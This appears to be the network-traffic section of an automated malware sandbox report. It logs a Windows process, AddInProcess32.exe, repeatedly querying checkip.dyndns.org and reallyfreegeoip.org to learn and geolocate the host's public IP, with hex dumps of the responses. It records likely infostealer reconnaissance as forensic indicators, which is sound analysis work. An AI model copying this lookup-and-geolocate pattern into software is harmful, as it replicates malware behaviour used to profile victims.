Aug 18, 2024 21:25:29.629023075 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 18, 2024 21:25:29.632811069 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 18, 2024 21:25:29.894542933 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 18, 2024 21:25:30.634960890 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 18, 2024 21:25:32.990401983 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49745	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:33.620098114 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 18, 2024 21:25:34.423590899 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:34 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49747	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:35.055329084 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:36.905236959 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49749	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:37.518127918 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:38.952339888 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49751	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:39.573591948 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:41.440228939 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:41 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49752	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:40.675791979 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:42.299026966 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 18, 2024 21:25:42.302038908 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 18, 2024 21:25:43.559058905 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:43 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 18, 2024 21:25:44.311788082 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 18, 2024 21:25:44.798716068 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:44 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:42.106892109 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:42.900427103 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49756	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:43.555547953 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:44.610726118 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:44 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49760	132.226.8.169	80	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:45.273150921 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:46.059539080 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:45 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49761	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:45.413191080 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 18, 2024 21:25:46.215481043 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:46 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49764	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:46.928288937 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:48.704647064 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:48 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49767	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:49.613893986 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:50.388500929 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:50 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49769	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:51.026159048 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:51.811882019 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:51 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49771	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:52.475917101 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:53.271522045 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:53 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49774	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:53.895152092 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:54.672028065 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:54 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49776	132.226.8.169	80	7592	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 18, 2024 21:25:55.329905987 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 18, 2024 21:25:56.138439894 CEST	272	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:56 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	188.114.96.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-18 19:25:30 UTC	708	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12389 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmIhPBb6A1ul6XZHN4UQ8MtvHh%2B1xzieHnHf%2FN7smfYNfskq0EJ4rcIlCVmamu1PqwuraroaUv056zLUarAU%2F0cXlvH3eHsJ28jn9mQHoG7kPNQCVeyzQsxa88g1GT5OCgXJ0EgD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a49fc701875-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-18 19:25:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	188.114.96.3	443	6936	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-18 19:25:33 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-08-18 19:25:33 UTC	704	IN	HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 19:25:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 12392 Last-Modified: Sun, 18 Aug 2024 15:59:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQrJm5swBNKo%2F0cDRIZuhNwy0sxZ9tbS8sTBfVJ3gaS9H9zUYluCvcx0m4%2BRGglnMjJ7VzuS3skNkEz34hbLLsgLosPHXybwrWtMEDGQXb65MN7tSMFLP2x6jhG11HAYTcKV6cUE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b544a5cbbae0c8e-EWR alt-svc: h3=":443"; ma=86400
2024-08-18 19:25:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 